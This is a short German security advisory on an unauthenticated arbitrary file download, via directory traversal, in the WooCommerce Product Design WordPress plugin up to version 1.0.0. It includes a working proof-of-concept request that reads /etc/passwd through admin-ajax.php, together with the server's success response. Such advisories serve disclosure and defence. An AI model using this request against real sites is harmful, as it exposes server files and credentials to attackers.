
Woocommerce Product Design <= 1.0.0 - Nicht authentifizierter beliebiger Datei-Download
WooCommerce Product Design <= 1.0.0 - Nicht authentifizierter beliebiger Dateidownload
Das WooCommerce Product Design Plugin für WordPress ist in allen Versionen bis einschließlich 1.0.0 anfällig für Directory Traversal. Dadurch ist es nicht authentifizierten Angreifern möglich, den Inhalt beliebiger Dateien auf dem Server zu lesen, die sensible Informationen enthalten können.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
action=pc_added_uploaded_image&file[path]=/etc/passwd
{
"path": "/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd",
"message": "Image Uploaded Successfully",
"url": "https://wp-dev.ddev.site/wp-content/uploads/wcpc/images/uploaded_images/passwd",
"status": "success"
}